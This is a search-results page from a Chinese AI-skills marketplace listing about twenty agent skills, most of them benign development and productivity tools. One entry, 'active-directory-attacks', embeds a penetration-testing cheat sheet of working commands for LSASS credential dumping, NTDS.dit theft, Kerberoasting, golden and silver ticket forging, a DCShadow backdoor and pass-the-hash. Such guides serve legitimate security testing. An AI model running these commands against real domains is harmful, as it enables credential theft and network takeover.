灵感菇

AI 技能的自然生态,你的一句话,蔓延出无限连接。

搜索结果

全部能力

找到 17783 个相关结果

通用助手 / 编排推荐

context-retrospective

context-retrospective

300

Analyze agent-user interaction transcripts to identify context network maintenance needs and guidance improvements. Use after significant agent interactions or…

Stars 76
uiagentcontextretrospective

通用助手 / 编排推荐

content-modeling

content-modeling

300

Create effective content models for your blocks that are easy for authors to work with. Use this skill anytime you are building new blocks, making changes to…

Stars 93
designuiauthcontent

软件工程 / 部署发布

bash-defensive-patterns

bash-defensive-patterns

300

Master defensive Bash programming techniques for production-grade scripts. Use when writing robust shell scripts, CI/CD pipelines, or system utilities…

Stars 37,666
uideploymentmonitoringbash

安全与治理 / 审核评估

Active Directory 攻击

active-directory-attacks

300

Active Directory 渗透测试技术指南 ## 信息收集 ### 域基础信息 - `nltest /domain_trusts` - 查看域信任关系 - `net view /domain` - 枚举域列表 - `nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>` - 定位域控制器 ### BloodHound 资产发现 ```powershell # SharpHound 数据收集 Invoke-BloodHound -CollectionMethod All -Domain target.com -ZipFileName loot.zip ``` ### LDAP 查询 ```powershell # 查找域管账户 ([adsisearcher]"(&(objectCategory=person)(objectClass=user)(adminCount=1))").FindAll() # 查找非约束委派的服务账户 Get-ADObject -LDAPFilter "(&(userAccountControl:1.2.840.113556.1.4.803:=524288)(samAccountType=805306368))" ``` ## 凭据获取 ### LSASS 内存提取 ```powershell # procdump + mimikatz 离线解析 procdump.exe -accepteula -ma lsass.exe lsass.dmp sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords full ``` ### SAM/NTDS.dit 提取 ```powershell # Volume Shadow Copy 方式 vssadmin create shadow /for=C: copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\loot\ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\loot\ # ntdsutil 官方工具 ntdsutil "ac i ntds" "ifm" "create full c:\loot" q q ``` ### Kerberoasting ```powershell # 请求 SPN 服务票据 Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/sql01.target.com:1433" # Rubeus 自动化 Rubeus.exe kerberoast /outfile:hashes.txt ``` ## Kerberos 攻击 ### AS-REP Roasting ```powershell # 查找 "Do not require Kerberos preauthentication" 账户 Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth # Rubeus 攻击 Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt ``` ### Golden Ticket ```powershell # 需要 krbtgt 账户的 NTLM hash mimikatz # lsadump::dcsync /domain:target.com /user:krbtgt mimikatz # kerberos::golden /user:Administrator /domain:target.com /sid:S-1-5-21-... /krbtgt:hash /ptt ``` ### Silver Ticket ```powershell # 针对特定服务,需要服务账户 NTLM hash mimikatz # kerberos::golden /user:fakeuser /domain:target.com /sid:S-1-5-21-... /target:sql01.target.com /service:MSSQLSvc /rc4:servicehash /ptt ``` ### DCShadow ```powershell # 需要域管权限,注册伪造 DC mimikatz # lsadump::dcshadow /object:targetuser /attribute:Description /value:"backdoor" ``` ## 横向移动 ### Pass-the-Hash ```powershell # mimikatz sekurlsa::pth /user:admin /domain:target.com /ntlm:hash /run:powershell.exe # Invoke-WMIExec Invoke-WMIExec -Target dc01.target.com -Username admin -Hash hash -Command "powershell -enc ..." ``` ### Over-Pass-the-Hash ```powershell # 获取 TGT 后使用正常 Kerberos 认证 Rubeus.exe asktgt /user:admin /rc4:hash /ptt ``` ### Pass-the-Ticket ```powershell # 导出票据后注入 mimikatz # sekurlsa::tickets /export mimikatz # kerberos::ptt [0;123456]-0-0-40810000-admin@krbtgt-target.com.kirbi ``` ### 约束委派滥用 ```powershell # 配置 S4U2Self + S4U2Proxy Rubeus.exe s4u /user:svc_account /rc4:hash /impersonateuser:admin /msdsspn:cifs/target.target.com /ptt ``` ### 基于资源的约束委派 (RBCD

Stars 0
uiuxtestingsecurity

通用助手 / 编排推荐

plan-task

plan-task

300

Refine, parallelize, and verify a draft task specification into a fully planned implementation-ready task

Stars 999
llmagentworkflowplan

研究学习 / 检索整理

API 筛选与排序

api-filtering-sorting

300

为 API 实现高级过滤和排序功能,包含查询解析、字段验证和优化。适用于构建搜索功能、复杂查询或灵活的数据检索端点。

Stars 0
uiperformancesecurityapi

软件工程 / 部署发布

container-registry-management

container-registry-management

300

Manage container registries (Docker Hub, ECR, GCR) with image scanning, retention policies, and access control.

Stars 219
uidockerpromptcontainer

通用助手 / 编排推荐

langchain-development

langchain-development

300

Expert guidance for LangChain and LangGraph development with Python, covering chain composition, agents, memory, and RAG implementations.

Stars 111
uiuxragllm

通用助手 / 编排推荐

migrate-nullable-references

migrate-nullable-references

300

Enable nullable reference types in a C# project and systematically resolve all warnings. USE FOR: adopting NRTs in existing codebases, file-by-file or project-wide migration, fixing CS8602/CS8618/CS86xx warnings, annotating APIs for nullability, cleaning up null-forgiving operators, upgrading dependencies with new nullable annotations. DO NOT USE FOR: projects already fully migrated with zero warnings (unless auditing suppressions), fixing a handful of nullable warnings in code that already has NRTs enabled, suppressing warnings without fixing them, C# 7.3 or earlier projects. INVOKES: Get-NullableReadiness.ps1 scanner script.

Stars 1,709
auditapimigratenullable

研究学习 / 检索整理

ln-1000-pipeline-orchestrator

ln-1000-pipeline-orchestrator

300

Drives a Story through full pipeline (tasks, validation, execution, quality). Use when executing a Story end-to-end from kanban board.

Stars 465
agent1000pipelineorchestrator

安全与治理 / 审核评估

ln-512-tech-debt-cleaner

ln-512-tech-debt-cleaner

299

Auto-fixes low-risk tech debt (unused imports, dead code, commented-out code) with >=90% confidence. Use when audit findings need safe automated cleanup.

Stars 465
audit512techdebt

研究学习 / 检索整理

ln-510-quality-coordinator

ln-510-quality-coordinator

299

Use when coordinating story quality evaluation with mandatory research, worker summaries, agent review, regression evidence, and bounded refinement.

Stars 465
authagentworkflowdebugging

软件工程 / 诊断修复

pymoo

pymoo

299

Multi-objective optimization framework. NSGA-II, NSGA-III, MOEA/D, Pareto fronts, constraint handling, benchmarks (ZDT, DTLZ), for engineering design and…

Stars 27,327
designpymoomultiobjective

软件工程 / 诊断修复

monorepo-tamagui

monorepo-tamagui

299

Monorepo development guidelines using Tamagui, Turbo, Next.js, Expo, Supabase, and cross-platform best practices.

Stars 111
reactnextjsuiux

安全与治理 / 审核评估

fact-check

fact-check

299

Verify technical accuracy of JavaScript concept pages by checking code examples, MDN/ECMAScript compliance, and external resources to prevent misinformation

Stars 66,424
auditfactcheckverify

通用助手 / 编排推荐

alicloud-ai-video-wan-r2v-test

alicloud-ai-video-wan-r2v-test

299

Model Studio Wan R2V 的最小化参考图生视频冒烟测试。

Stars 0
uiauthalicloudvideo

研究学习 / 检索整理

postgres

postgres

299

Use this skill for any PostgreSQL database work — table design, indexing, data types, constraints, extensions (pgvector, PostGIS, TimescaleDB), search, and migrations. **Trigger when user asks to:** - Design or modify PostgreSQL tables, schemas, or data models - Choose data types, constraints, indexes, or partitioning strategies - Work with pgvector embeddings, semantic search, or RAG - Set up full-text search, hybrid search, or BM25 ranking - Use PostGIS for spatial/geographic data - Set up TimescaleDB hypertables for time-series data - Migrate tables to hypertables or evaluate migration candidates **Keywords:** PostgreSQL, Postgres, SQL, schema, table design, indexes, constraints, pgvector, PostGIS, TimescaleDB, hypertable, semantic search, hybrid search, BM25, time-series

Stars 1,729
designuidatabasepostgres

软件工程 / 诊断修复

法院拍卖公告搜索

court-auction-notice-search

299

浏览大法院拍卖信息(courtauction.go.kr)的房地产拍卖公告,支持按拍卖日期·法院·日期/期间投标筛选,将每条公告展开显示为案件编号·用途·地址·鉴定评估价·最低拍卖价,并可通过法院+案件编号直接查询案件……

Stars 0
uiplaywrightapiworkflow

通用助手 / 编排推荐

阿里云AI视频-WanVideo测试

alicloud-ai-video-wan-video-test

299

Model Studio Wan Video 的最小化视频生成冒烟测试。

Stars 0
uiauthalicloudvideo

研究学习 / 检索整理

product-manager-toolkit

product-manager-toolkit

299

Comprehensive toolkit for product managers including RICE prioritization, customer interview analysis, PRD templates, discovery frameworks, and go-to-market strategies. Use for feature prioritization, user research synthesis, requirement documentation, and product strategy development.

Stars 138
uiworkflowproductmanager

第 422 / 890 页